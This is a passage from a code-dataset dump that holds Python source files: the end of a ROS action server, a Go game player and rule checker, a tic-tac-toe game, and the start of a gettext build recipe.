cond(self):\n return self._as.is_preempt_requested()\n\n def execute_cb(self, goal):\n sk_manager = SkeletonManager()\n if not self.cond(): \n sk_manager.publish_skeleton()\n\n\t #Split on multiple methods to allow system to stop the action server\n self._as.set_succeeded(skeletonActionResult())\n\n\nif __name__ == \"__main__\":\n rospy.init_node('skeleton_action_server')\n \n skeleton_server()\n rospy.spin()\n","sub_path":"scripts/skeleton_action.py","file_name":"skeleton_action.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"423255563","text":"import queue as Queue\nimport copy\n\nclass GoPlayerMin():\n\tdef __init__(self, player_name=None, player_stone=None, board_size=None):\n\t\t\"\"\"\n\t\tThis class implements a Go Player component that will make\n\t\ta legal move as a given stone given the board's history.\n\n\t\tIt will internally store the player name, player stone, and have\n\t\toperations to check that legal moves are valid. In the case that it is valid\n\t\tthe player will play at the legal smallest col index primarily and\n\t\tlegal smallest row index primarily. If there are no legal moves, it will\n\t\tpass. If the history is invalid, it will reply with \"This history makes no sense!\".\n\n\t\tIf there are two consecutive passes, the player is given the score and the winner\n\t\tof the game.\n\t\t\"\"\"\n\t\tself.player_name = \"no name\" if player_name is None else player_name\n\t\tself.player_stone = \"B\" if player_stone is None else player_stone\n\t\tself.board_size = 19 if board_size is None else board_size\n\t\tself.rules = GoBoard(self.board_size)\n\n\n\n\t################################\n\t# GAMEPLAY RESPONSES\n\t################################\n\n\t# Returns appropriate responses given valid input\n\tdef get_response(self, input):\n\t\tif ((len(input) == 1) and (input == [\"register\"])):\n\t\t\treturn self.register()\n\t\telif ((len(input) == 2) and (input[0] == \"receive-stones\") and ((input[1] == \"B\") or (input[1] == \"W\"))):\n\t\t\tself.receive_stone(input[1])\n\t\telif ((len(input) == 2) and (input[0] == \"make-a-move\") and ((len(input[1]) == 1) or (len(input[1]) == 2) or (len(input[1]) == 3))):\n\t\t\treturn self.make_move(input[1])\n\t\telse:\n\t\t\traise Exception(\"Invalid input has no appropriate response\")\n\n\t# Internally stores player name, default \"no name\"\n\tdef register(self):\n\t\treturn self.player_name\n\n\t# Initiates game, assigns player a stone and clears previous game board\n\tdef receive_stone(self, stone):\n\t\tself.player_stone = stone\n\n\t# Update go_board state if board history is valid\n\tdef make_move(self, boards_arr):\n\t\tif (self.rules.validate_history(self.player_stone, boards_arr)):\n\t\t\treturn self.find_move(self.player_stone, boards_arr[0], boards_arr)\n\t\telse:\n\t\t\treturn \"This history makes no sense!\"\n\n\t# Finds first valid move in a min col, row coordinate, otherwise \"pass\"\n\tdef find_move(self, stone, board, history):\n\t\tfor row in range(self.board_size):\n\t\t\tfor col in range(self.board_size):\n\t\t\t\ttry_place = board\n\t\t\t\tif (board[col][row] == \" \"):\n\t\t\t\t\ttry_place = self.rules.place(stone, (col, row), history[0])\n\t\t\t\t\tvisited = [ [False] * self.board_size for row in range(self.board_size) ]\n\t\t\t\t\tneighbors = self.rules.find_neighbors((col, row))\n\t\t\t\t\tq = Queue.Queue()\n\t\t\t\t\tfor n in neighbors:\n\t\t\t\t\t\tif ((try_place[n[0]][n[1]] != stone) and (not self.rules.reachable(n, \" \", try_place))):\n\t\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\t\tq.put(n)\n\n\t\t\t\t\twhile (q.empty() != True):\n\t\t\t\t\t\tcheck_point = q.get()\n\t\t\t\t\t\ttry_place = self.rules.remove(try_place[check_point[0]][check_point[1]], check_point, try_place)\n\t\t\t\t\t\tn_neighbors = self.rules.find_neighbors(check_point)\n\t\t\t\t\t\tfor n in n_neighbors:\n\t\t\t\t\t\t\tif ((try_place[n[0]][n[1]] == self.rules.get_opponent(stone)) and (not visited[n[0]][n[1]])):\n\t\t\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\t\t\tq.put(n)\n\n\t\t\t\t\tif (len(history) == 3):\n\t\t\t\t\t\tif (try_place != history[1]):\n\t\t\t\t\t\t\tif (self.rules.reachable((col, row), \" \", try_place)):\n\t\t\t\t\t\t\t\treturn self.rules.idx_to_point(row, col)\n\n\t\t\t\t\tif (len(history) != 3):\n\t\t\t\t\t\tif (self.rules.reachable((col, row), \" \", try_place)):\n\t\t\t\t\t\t\t\treturn self.rules.idx_to_point(row, col)\n\n\t\treturn \"pass\"\n\t\n\n\nclass GoBoard():\n\tdef __init__(self, board_size=None):\n\t\t\"\"\"\n\t\tThis class implements a Go board component that returns a response\n\t\tbased on a statement executed on a given 19 x 19 Go board. The\n\t\tstatements are as follows:\n\n\t\tQuery Statements:\n\t\t\t[\"occupied?\", Point] - returns True if a Stone at point, else False\n\t\t\t[\"occupies?\", Stone, Point] - returns True if stone at point, else False\n\t\t\t[\"reachable?\", Point, MaybeStone] - returns True if exists path of vertical\n\t\t\t\t\t\tor horizontal adjacent points of same Stone from Stone at Point to\n\t\t\t\t\t\tMaybestone, else False. Implemented BFS with queue\n\n\t\tCommand Statements:\n\t\t\t[\"place\", Stone, Point] - returns updated Board with Stone at Point,\n\t\t\t\t\t\terror if invalid move \"This seat is taken!\"\n\t\t\t[\"remove\", Stone, Point] - returns updated Board with Stone removed from\n\t\t\t\t\t\tPoint, error if invalid \"I am just a board! I cannot remove\n\t\t\t\t\t\twhat is not there!\"\n\t\t\t[\"get-points\", MaybeStone] - returns array of Points that has stored all\n\t\t\t\t\t\tPoint positions of the given MaybeStone input in the Go board,\n\t\t\t\t\t\tsorted in increasing lexicographic order.\n\t\t\"\"\"\n\t\tself.board_size = 19 if board_size is None else board_size\n\n\n\t###############################\n\t# BOARD RESPONSES\n\t###############################\n\n\t# Returns appropriate response given a valid input form\n\tdef get_response(self, input):\n\t\tif (len(input) == self.board_size):\n\t\t\treturn self.get_score(input)\n\t\telif ((len(input) == 2) and (input[1] == \"pass\")):\n\t\t\treturn self.pass_turn(input[0])\n\t\telif (len(input) == 2):\n\t\t\treturn self.get_validity(input[0], self.point_to_idx(input[1][0]), input[1][1])\n\t\telse:\n\t\t\traise Exception(\"Invalid input has no appropriate response\")\n\n\t# Returns the score of \"B\" and \"W\" given a final board state.\n\tdef get_score(self, board):\n\t\tblack_area = len(self.get_points(\"B\", board))\n\t\twhite_area = len(self.get_points(\"W\", board))\n\t\tneutral = 0\n\n\t\tall_empty = self.get_points(\" \", board)\n\t\tfor intersection in all_empty:\n\t\t\tpoint = self.point_to_idx(intersection)\n\t\t\tif ((not self.reachable(point, \"W\", board)) and (not self.reachable(point, \"B\", board))):\n\t\t\t\tneutral += 1\n\t\t\telif (not self.reachable(point, \"W\", board)):\n\t\t\t\tblack_area += 1\n\t\t\telif (not self.reachable(point, \"B\", board)):\n\t\t\t\twhite_area += 1\n\t\t\telse:\n\t\t\t\tneutral += 1\n\n\t\tif ((black_area + white_area + neutral) == (self.board_size * self.board_size)):\n\t\t\treturn {\"B\": black_area, \"W\": white_area}\n\t\telse:\n\t\t\traise Exception(\"Invalid scoring, sum of black, white, and neutral must be intersection total.\")\n\n\n\n\t###############################\n\t# RULE CHECKER INVARIANTS\n\t###############################\n\t\"\"\"\n\t1. Go is a game between two players, called Black and White.\n\t2. Go is played on a plane grid of horizontal and vertical lines, called a board.\n\t\t - Points on the board are intersections between lines.\n\t\t - Points are adjacent if they are distinct and connected by a line\n\t\t with no other intersections between them.\n\t3. Go is played with tokens know as stones. Each player has at their\n\t\tdisposal an adequate supply of their color stone.\n\t4. \tAt any time in the game, each intersection may only be Empty,\n\t\toccupied by white or occupied by black stone.\n\t5.\tAt the beginning of the game, the board is empty.\n\t6.\tBlack moves first, the player then alternate moves.\n\t7.\tMoves are either \"pass\" or Play.\n\t\t- Can only play at empty intersections.\n\t\t- Can only play if stone will still have liberties after play.\n\t\t- Liberties counted by chained stones.\n\t\t- Stones without liberties after play are removed from board.\n\t8. A Play is illegal if it would repeat a previously played position (Ko).\n\t9. The game ends when both players have pass consecutive.\n\t10. The player with the higher score wins, otherwise drawn game.\n\t\"\"\"\n\n\t# Validates history only, independent of requested move\n\tdef validate_history(self, stone, boards_arr):\n\n\t\t# Board history len 1 means just started, board is empty, black to move\n\t\tif (len(boards_arr) == 1):\n\t\t\tif (stone != \"B\"):\n\t\t\t\treturn False\n\t\t\tif (len(self.get_points(\" \", boards_arr[0])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t# Board history len 2, first is empty board, black moved once, it's white's turn\n\t\telif (len(boards_arr) == 2):\n\t\t\tif (stone != \"W\"):\n\t\t\t\treturn False\n\t\t\tif ((len(self.get_points(\"B\", boards_arr[0])) > 1) or (len(self.get_points(\"W\", boards_arr[0])) != 0)):\n\t\t\t\treturn False\n\t\t\tif (len(self.get_points(\" \", boards_arr[1])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t# Board history len 3\n\t\telif (len(boards_arr) == 3):\n\n\t\t\t# Check board history for Ko rule\n\t\t\tif (boards_arr[0] == boards_arr[2]):\n\t\t\t\treturn False\n\n\t\t\t# Check game over because 2 consecutive passes\n\t\t\tif ((boards_arr[0] == boards_arr[1]) and (boards_arr[0] == boards_arr[2])):\n\t\t\t\treturn False\n\t\t\tif ((boards_arr[1] == boards_arr[2]) and (len (self.get_points(\" \", boards_arr[1])) == (self.board_size * self.board_size)) and (len (self.get_points(\" \", boards_arr[2])) == (self.board_size * self. board_size)) and (len (self.get_points(\"W\", boards_arr[0])) != 1)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains no dead stones\n\t\t\tif ((not self.check_dead_removed(boards_arr[0])) or (not self.check_dead_removed(boards_arr[1])) or (not self.check_dead_removed(boards_arr[2]))):\n\t\t\t\treturn False\n\n\t\t\t# Check that players are alternating plays between \"B\" and \"W\"\n\t\t\tif (not self.get_player_order(boards_arr[0], boards_arr[1], boards_arr[2], stone)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains only valid moves\n\t\t\tif ((not self.get_move_validity(boards_arr[2], boards_arr[1])) or (not self.get_move_validity(boards_arr[1], boards_arr[0]))):\n\t\t\t\treturn False\n\n\t\telse:\n\t\t\traise Exception(\"Board history length should be 1 to 3.\")\n\n\t\treturn True\n\n\n\t# Returns the validity of a Move given a [Stone, [Point, Boards]] valid input w/ board history\n\tdef get_validity(self, stone, point, boards_arr):\n\n\t\t# Board history len 1 means just started, board is empty, black to move\n\t\tif (len(boards_arr) == 1):\n\t\t\tif (stone != \"B\"):\n\t\t\t\treturn False\n\n\t\t\tif (len(self.get_points(\" \", boards_arr[0])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t# Board history len 2, first is empty board, black moved once, it's white's turn\n\t\telif (len(boards_arr) == 2):\n\t\t\tif (stone != \"W\"):\n\t\t\t\treturn False\n\t\t\tif ((len(self.get_points(\"B\", boards_arr[0])) > 1) or (len(self.get_points(\"W\", boards_arr[0])) != 0)):\n\t\t\t\treturn False\n\t\t\tif (len(self.get_points(\" \", boards_arr[1])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t\t# Check if requested play is valid\n\t\t\ttry_place = self.place(stone, point, boards_arr[0])\n\t\t\tif (try_place == \"This seat is taken!\"):\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tif ((not self.get_move_validity(boards_arr[0], try_place))):\n\t\t\t\t\treturn False\n\n\t\t# Board history len 3, check moves valid between them, check current move\n\t\telif (len(boards_arr) == 3):\n\n\t\t\t################################\n\t\t\t# Check board history\n\t\t\t################################\n\n\t\t\t# Check board history for Ko rule\n\t\t\tif (boards_arr[0] == boards_arr[2]):\n\t\t\t\treturn False\n\n\t\t\t# Check game over because 2 consecutive passes\n\t\t\tif ((boards_arr[0] == boards_arr[1]) and (boards_arr[0] == boards_arr[2])):\n\t\t\t\treturn False\n\t\t\tif ((boards_arr[1] == boards_arr[2]) and (len (self.get_points(\" \", boards_arr[1])) == (self.board_size * self.board_size)) and (len (self.get_points(\" \", boards_arr[2])) == (self.board_size * self. board_size)) and (len (self.get_points(\"W\", boards_arr[0])) != 1)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains no dead stones\n\t\t\tif ((not self.check_dead_removed(boards_arr[0])) or (not self.check_dead_removed(boards_arr[1])) or (not self.check_dead_removed(boards_arr[2]))):\n\t\t\t\treturn False\n\n\t\t\t# Check that players are alternating plays between \"B\" and \"W\"\n\t\t\tif (not self.get_player_order(boards_arr[0], boards_arr[1], boards_arr[2], stone)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains only valid moves\n\t\t\tif ((not self.get_move_validity(boards_arr[2], boards_arr[1])) or (not self.get_move_validity(boards_arr[1], boards_arr[0]))):\n\t\t\t\treturn False\n\n\n\t\t\t#############################\n\t\t\t# Check move against history\n\t\t\t#############################\n\n\t\t\ttry_place = self.place(stone, point, boards_arr[0])\n\n\t\t\tif (try_place == \"This seat is taken!\"):\n\t\t\t\treturn False\n\t\t\telif (not self.reachable(point, \" \", try_place)):\n\t\t\t\tvisited = [ [False] * self.board_size for row in range(self.board_size) ]\n\t\t\t\tneighbors = self.find_neighbors(point)\n\n\t\t\t\tq = Queue.Queue()\n\t\t\t\tfor n in neighbors:\n\t\t\t\t\tif ((try_place[n[0]][n[1]] != stone) and (not self.reachable(n, \" \", try_place))):\n\t\t\t\t\t\tq.put(n)\n\n\t\t\t\twhile (q.empty() != True):\n\t\t\t\t\tcheck_point = q.get()\n\t\t\t\t\ttry_place = self.remove(try_place[check_point[0]][check_point[1]], check_point, try_place)\n\t\t\t\t\tn_neighbors = self.find_neighbors(check_point)\n\t\t\t\t\tfor n in n_neighbors:\n\t\t\t\t\t\tif ((try_place[n[0]][n[1]] == try_place[check_point[0]][check_point[1]]) and (not visited[check_point[0]][check_point[1]])):\n\t\t\t\t\t\t\tvisited[check_point[0]][check_point[1]] = True\n\t\t\t\t\t\t\tq.put(n)\n\n\t\t\t\tif (not self.reachable(point, \" \", try_place)):\n\t\t\t\t\treturn False\n\n\t\t\t\tif (not self.get_move_validity(boards_arr[0],try_place)):\n\t\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tif (not self.get_move_validity(boards_arr[0],try_place)):\n\t\t\t\t\treturn False\n\n\t\t\t# Check that requested move doesn't violate Ko rule\n\t\t\tif (boards_arr[1] == try_place):\n\t\t\t\treturn False\n\n\t\telse:\n\t\t\traise Exception(\"Board history length should be 1 to 3.\")\n\n\t\treturn True\n\n\t# Check that a move is valid between previous and current board\n\tdef get_move_validity(self, prev_board, curr_board):\n\n\t\t# Get all the difference between state\n\t\tplaced = []\n\t\tremoved = []\n\t\tdead_removed = []\n\n\t\tfor row in range(self.board_size):\n\t\t\tfor col in range(self.board_size):\n\t\t\t\tif (prev_board[row][col] != curr_board[row][col]):\n\t\t\t\t\tif (prev_board[row][col] == \" \"):\n\t\t\t\t\t\tplaced.append([curr_board[row][col], (row, col)])\n\t\t\t\t\telif ((prev_board[row][col] == \"B\") and (curr_board[row][col] == \" \")):\n\t\t\t\t\t\tremoved.append([prev_board[row][col], (row, col)])\n\t\t\t\t\telif ((prev_board[row][col] == \"W\") and (curr_board[row][col] == \" \")):\n\t\t\t\t\t\tremoved.append([prev_board[row][col], (row, col)])\n\t\t\t\t\t# Unexplained changes in board state\n\t\t\t\t\telif ((prev_board[row][col] == \"B\") and (curr_board[row][col] == \"W\")):\n\t\t\t\t\t\treturn False\n\t\t\t\t\telif ((prev_board[row][col] == \"W\") and (curr_board[row][col] == \"B\")):\n\t\t\t\t\t\treturn False\n\n\t\t# Move was a pass, boards should be identical\n\t\tif (len(placed) == 0):\n\t\t\tif (len(removed) != 0):\n\t\t\t\treturn False\n\t\t\tif (prev_board != curr_board):\n\t\t\t\treturn False\n\n\t\t# Check if place on board has liberties, and for removed dead stones\n\t\tif (len(placed) == 1):\n\t\t\ttry_place = self.place(placed[0][0], placed[0][1], prev_board)\n\t\t\tif (try_place == \"This seat is taken!\"):\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\t#dup_try_place = copy.deepcopy(try_place)\n\t\t\t\twhite_b4 = len(self.get_points(\"W\", prev_board))\n\t\t\t\tblack_b4 = len(self.get_points(\"B\", prev_board))\n\t\t\t\tstone = placed[0][0]\n\n\t\t\t\tvisited = [ [False] * self.board_size for row in range(self.board_size) ]\n\t\t\t\tneighbors = self.find_neighbors(placed[0][1])\n\t\t\t\tq = Queue.Queue()\n\t\t\t\tfor n in neighbors:\n\t\t\t\t\tif ((try_place[n[0]][n[1]] == self.get_opponent(stone)) and (not self.reachable(n, \" \", try_place))):\n\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\tq.put(n)\n\n\t\t\t\twhile (q.empty() != True):\n\t\t\t\t\tcheck_point = q.get()\n\t\t\t\t\tdead_removed.append([try_place[check_point[0]][check_point[1]], check_point])\n\t\t\t\t\ttry_place = self.remove(try_place[check_point[0]][check_point[1]], check_point, try_place)\n\t\t\t\t\tn_neighbors = self.find_neighbors(check_point)\n\t\t\t\t\tfor n in n_neighbors:\n\t\t\t\t\t\tif ((try_place[n[0]][n[1]] == self.get_opponent(stone)) and (not visited[n[0]][n[1]])):\n\t\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\t\tq.put(n)\n\t\t\t\t# Check that all things that things that shouldn't be removed weren't removed\n\t\t\t\tremoved_sorted = sorted(removed)\n\t\t\t\tdead_removed_sorted = sorted(dead_removed)\n\n\t\t\t\tif (removed_sorted != dead_removed_sorted):\n\t\t\t\t\treturn False\n\n\t\t\t\tif ((stone == \"B\") and (len(removed_sorted) == 0) and (white_b4 != len(self.get_points(\"W\", try_place)))):\n\t\t\t\t\treturn False\n\n\t\t\t\tif ((stone == \"W\") and (len(removed_sorted) == 0) and (black_b4 != len(self.get_points(\"B\", try_place)))):\n\t\t\t\t\treturn False\n\n\n\t\t\t\t# If still no liberties present after removal of dead, then invalid move\n\t\t\t\tif (not self.reachable(placed[0][1], \" \", try_place)):\n\t\t\t\t\treturn False\n\n\t\t# Can only add one stone every turn or pass\n\t\tif (len(placed) > 1):\n\t\t\treturn False\n\n\t\treturn True\n\n\n\n\t###############################\n\t# QUERIES\n\t###############################\n\n\t# Occupied takes an index tuple and returns True\n\t# if board at that point is not Empty (\" \"), else False\n\tdef occupied(self, idx, board):\n\t\treturn (board[idx[0]][idx[1]] != \" \")\n\n\t# Occupies takes an index tuple and returns True if\n\t# board at that point has that Stone, else False\n\tdef occupies(self, stone, idx, board):\n\t\treturn (board[idx[0]][idx[1]] == stone)\n\n\t# Return True if there is a path of adjacent points to Point\n\t# that have the same kind of MaybeStone as the given point and\n\t# the path reaches the given MaybeStone, else False\n\tdef reachable(self, idx, maybe_stone, board):\n\t\tvisited = [ [False] * self.board_size for row in range(self.board_size)]\n\n\t\tstart_type = board[idx[0]][idx[1]]\n\t\tif (start_type == maybe_stone):\n\t\t\treturn True\n\n\t\tq = Queue.Queue()\n\t\tq.put(idx)\n\n\t\twhile (q.empty() != True):\n\t\t\tcheck_point = q.get()\n\t\t\tif (not visited[check_point[0]][check_point[1]]):\n\t\t\t\tvisited[check_point[0]][check_point[1]] = True\n\t\t\t\tneighbors = self.find_neighbors(check_point)\n\t\t\t\tfor n in neighbors:\n\t\t\t\t\trow = n[0]\n\t\t\t\t\tcol = n[1]\n\t\t\t\t\tif (board[row][col] == maybe_stone):\n\t\t\t\t\t\treturn True\n\t\t\t\t\tif (board[row][col] == start_type):\n\t\t\t\t\t\tq.put(n)\n\t\treturn False\n\n\n\n\t###############################\n\t# COMMANDS\n\t###############################\n\n\t# Passes turn\n\tdef pass_turn(self, player):\n\t\treturn True\n\n\t# Places a stone at the given point on a go_board if not occupied\n\tdef place(self, stone, idx, board):\n\t\tif (self.occupied(idx, board)):\n\t\t\treturn \"This seat is taken!\"\n\t\telse:\n\t\t\tnew_board = [ [\" \"] * self.board_size for row in range(self.board_size)]\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tnew_board[row][col] = board[row][col]\n\t\t\tnew_board[idx[0]][idx[1]] = stone\n\t\t\t\n\t\t\treturn new_board\n\n\t# Removes a stone from given point on go_board if occupied\n\tdef remove(self, stone, idx, board):\n\t\tif ((self.occupied(idx, board) == False) or (not self.occupies(stone, idx, board))):\n\t\t\treturn \"I am just a board! I cannot remove what is not there!\"\n\t\telse:\n\t\t\tnew_board = [ [\" \"] * self.board_size for row in range(self.board_size)]\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tnew_board[row][col] = board[row][col]\n\t\t\tnew_board[idx[0]][idx[1]] = \" \"\n\t\t\t\n\t\t\treturn new_board\n\n\t# Returns array of points that maybe_stone occupies on go_board\n\tdef get_points(self, maybe_stone, board):\n\t\tpoints = []\n\t\tfor x in range(self.board_size):\n\t\t\tfor y in range(self.board_size):\n\t\t\t\tif (board[x][y] == maybe_stone):\n\t\t\t\t\tpoints.append(self.idx_to_point(y, x))\n\t\tpoints = sorted(points)\n\t\treturn points\n\n\n\n\t###############################\n\t# HELPER FUNCTIONS\n\t###############################\n\t# Converts point from \"N-N\" to indices\n\tdef point_to_idx(self, point):\n\t\tidx = point.split(\"-\")\n\t\tfor i in range(len(idx)):\n\t\t\tidx[i] = int(idx[i])\n\n\t\treturn idx[1] - 1, idx[0] - 1\n\n\t# Converts indices to \"N-N\" point position\n\tdef idx_to_point(self, x, y):\n\t\treturn str(x + 1) + \"-\" + str(y + 1)\n\n\t# Finds all the adjacent neighbors to a given point\n\tdef find_neighbors(self, idx):\n\t\tneighbors = []\n\t\tx_pos = [-1, 0, 1, 0]\n\t\ty_pos = [0, 1, 0, -1]\n\n\t\tfor i in range(4):\n\t\t\tn_x = idx[0] + x_pos[i]\n\t\t\tn_y = idx[1] + y_pos[i]\n\t\t\tif ((n_x >= 0 and n_x <= 18) and (n_y >= 0 and n_y <= 18)):\n\t\t\t\tpoint_idx = (n_x, n_y)\n\t\t\t\tneighbors.append(point_idx)\n\n\t\treturn neighbors\n\n\t# Gets other player\n\tdef get_opponent(self, curr_player):\n\t\treturn \"W\" if (curr_player == \"B\") else \"B\"\n\n\t# Gets player move order\n\tdef get_player_order(self, board0, board1, board2, curr_player):\n\t\torder = []\n\n\t\tif (board1 == board2):\n\t\t\torder.append(curr_player)\n\t\telse:\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tif (board2[row][col] != board1[row][col]):\n\t\t\t\t\t\tif (board2[row][col] == \" \"):\n\t\t\t\t\t\t\torder.append(board1[row][col])\n\n\n\t\tif (self.get_points(\" \", board0) == self.get_points(\" \", board1)):\n\t\t\torder.append(self.get_opponent(curr_player))\n\t\telse:\n\t\t\tfor row in range(self.board_size):\n\t\t\t\tfor col in range(self.board_size):\n\t\t\t\t\tif (board1[row][col] != board0[row][col]):\n\t\t\t\t\t\tif (board1[row][col] == \" \"):\n\t\t\t\t\t\t\torder.append(board0[row][col])\n\t\torder.append(curr_player)\n\n\t\tif (len(order) == 3):\n\t\t\tif ((order[0] != order[2]) or (order[0] == order[1]) or (order[1] == order[2])):\n\t\t\t\treturn False\n\n\t\treturn True\n\n\t# Checks that all stones w/out liberties removed from board\n\tdef check_dead_removed(self, board):\n\t\tfor row in range(self.board_size):\n\t\t\tfor col in range(self.board_size):\n\t\t\t\tif ((board[row][col] == \"B\") and (not self.reachable((row, col), \" \", board))):\n\t\t\t\t\treturn False\n\t\t\t\telif ((board[row][col] == \"W\") and (not self.reachable((row, col), \" \", board))):\n\t\t\t\t\treturn False\n\n\t\treturn True\n\n","sub_path":"Deliverables/5/5.1/go.py","file_name":"go.py","file_ext":"py","file_size_in_byte":20873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"414600744","text":"theBoard = {'top-L': ' ', 'top-M': ' ', 'top-R': ' ',\n\t\t\t'mid-L': ' ', 'mid-M': ' ', 'mid-R': ' ',\n\t\t\t'low-L': ' ', 'low-M': ' ', 'low-R': ' '} # dictionary of the tic tac toe board\n\ndef printBoard(board): # draws the tic tac toe board on the screen\n\tprint(board['top-L'] + '|' + board['top-M'] + '|' + board['top-R'])\n\tprint('-+-+-')\n\tprint(board['mid-L'] + '|' + board['mid-M'] + '|' + board['mid-R'])\n\tprint('-+-+-')\n\tprint(board['low-L'] + '|' + board['low-M'] + '|' + board['low-R'])\n\ndef mover(turn, move):\n\tmove = input(\"Enter a space on the grid for your \" +turn+ \" mark to be placed. \\n\")\n\tprint(\"\")\n\tif not (theBoard.get(move) == 'X' or theBoard.get(move) == 'O'):\n\t\ttheBoard[move] = turn\n\t\tprintBoard(theBoard)\n\t\tturnSwitcher(turn)\n\telse:\n\t\tprint(\"The space\" +move+ \" is filled with a \" +turn+ \" already. Please try again!\")\n\t\tmover(turn, move)\n\ndef winningCombos(): # deteremines if either user X or user Y has achieved a winning combination\n\t# X possibilities vertical\n\tif (((theBoard['top-L'] == 'X') and (theBoard['mid-L'] == 'X') and (theBoard['low-L'] == 'X')) or ((theBoard['top-M'] == 'X') and (theBoard['mid-M'] == 'X') and (theBoard['low-M'] == 'X')) or ((theBoard['top-M'] == 'X') and (theBoard['mid-R'] == 'X') and (theBoard['low-R'] == 'X'))):\n\t\tprint('The winner is X!')\n\t\treturn True\n\t# Y possibilities vertical'\n\tif (((theBoard['top-L'] == 'Y') and (theBoard['mid-L'] == 'Y') and (theBoard['low-L'] == 'Y')) or ((theBoard['top-M'] == 'Y') and (theBoard['mid-M'] == 'Y') and (theBoard['low-M'] == 'Y')) or ((theBoard['top-M'] == 'Y') and (theBoard['mid-R'] == 'Y') and (theBoard['low-R'] == 'Y'))):\n\t\tprint('The winner is O!')\n\t\treturn True\n\t# X possibilities horizontal\n\tif (((theBoard['top-L'] == 'X') and (theBoard['top-M']== 'X') and (theBoard['top-R'] == 'X')) or ((theBoard['mid-L'] == 'X') and (theBoard['mid-M']== 'X') and (theBoard['mid-R'] == 'X')) or ((theBoard['low-L'] == 'X') and (theBoard['low-M'] == 'X') and (theBoard['low-R'] == 'X'))):\n\t\tprint('The winner is X!')\n\t\treturn True\n\t# Y possibilities horizontal\n\tif (((theBoard['top-L'] == 'Y') and (theBoard['top-M']== 'Y') and (theBoard['top-R'] == 'Y')) or ((theBoard['mid-L'] == 'Y') and (theBoard['mid-M']== 'Y') and (theBoard['mid-R'] == 'Y')) or ((theBoard['low-L'] == 'Y') and (theBoard['low-M'] =='Y') and (theBoard['low-R'] == 'Y'))):\n\t\tprint('The winner is O!')\n\t\treturn True\n\t# X possibilities diagonal\n\tif (((theBoard['top-L'] == 'X') and (theBoard['mid-M'] == 'X') and (theBoard['low-R'] == 'X')) or ((theBoard['top-R'] == 'X') and (theBoard['mid-M'] == 'X') and (theBoard['low-L'] == 'X'))):\n\t\tprint('The winner is X!')\n\t\treturn True\n\t# Y possibilities diagonal\n\tif (((theBoard['top-L'] == 'Y') and (theBoard['mid-M'] == 'Y') and (theBoard['low-R'] == 'Y')) or ((theBoard['top-R'] == 'Y') and (theBoard['mid-M'] == 'Y') and (theBoard['low-L'] == 'Y'))):\n\t\tprint('The winner is O!')\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef turnSwitcher(turn):\n\tif turn == 'X':\n\t\tturn = 'O'\n\telse:\n\t\tturn = 'X'\n\treturn turn\n\ndef switchTheTurn(switchIt, turn):\n\tif switchIt is True:\n\t\tif turn == 'X':\n\t\t\tturn = 'O'\n\t\telse:\n\t\t\tturn = 'X'\n\t\t\t\n\tif switchIt is False:\n\t\tturn = turn\n\treturn turn\n\n\n\t\t\n\ndef main():\n\tprint(\"Welcome to Tic Tac Toe!\")\n\tprint(\"Instructions: Player X will go first. \\n When prompted to enter a space, you may enter: \\n top-L, top-M, top-R \\n mid-L, mid-M, mid-R \\n low-L, low-M, low-R\")\n\tprint(\"\")\n\tprintBoard(theBoard)\n\tprint(\"\")\n\tturn = 'X'\n\tturn_counter = 0;\n\twhile not winningCombos() is True and turn_counter < 8:\n\t\tmove = ''\n\t\tmove = input(\"Enter a space on the grid for your \" +turn+ \" mark to be placed. \\n\")\n\t\tprint(\"\")\n\n\t\tif not move in theBoard.keys():\n\t\t\tprint(\"That is an invalid position! Try again!\")\n\t\t\tprint(\"\")\n\t\t\tprintBoard(theBoard)\n\t\t\tswitchIt = False\n\n\n\n\t\telif not (theBoard.get(move) == 'X' or theBoard.get(move) == 'O'):\n\t\t\ttheBoard[move] = turn\n\t\t\tprintBoard(theBoard)\n\t\t\tprint(\"\")\n\t\t\tswitchIt = True\n\t\t\tturn_counter = turn_counter + 1\n\n\t\t\t\n\t\telse:\n\t\t\tprint(\"The space \" +move+ \" is filled with a \" +turn+ \" already. Please try again!\")\n\t\t\tprintBoard(theBoard)\n\t\t\tprint(\"\")\n\t\t\tswitchIt = False\n\n\t\tturn = switchTheTurn(switchIt, turn)\n\tprint(\"There is no winner :(\")\n\t\t\t\n\nmain()\n\n\n\n","sub_path":"ticTacToe.py","file_name":"ticTacToe.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"210686874","text":"# -*- coding: utf-8 -*-\nimport info\nfrom Package.CMakePackageBase import *\n\n\nclass subinfo(info.infoclass):\n def setTargets(self):\n self.targets['0.18'] = 'http://ftp.gnu.org/pub/gnu/gettext/gettext-0.18.tar.gz'\n self.targetInstSrc['0.18'] = \"gettext-0.18\"\n self.patchToApply['0.18'] = [(\"gettext-0.18-20130523.diff\", 1)]\n self.targetDigests['0.18'] = 'de396ec6877a451427d8597197d18c2d4b8f1a26'\n self.description = \"GNU internationalization 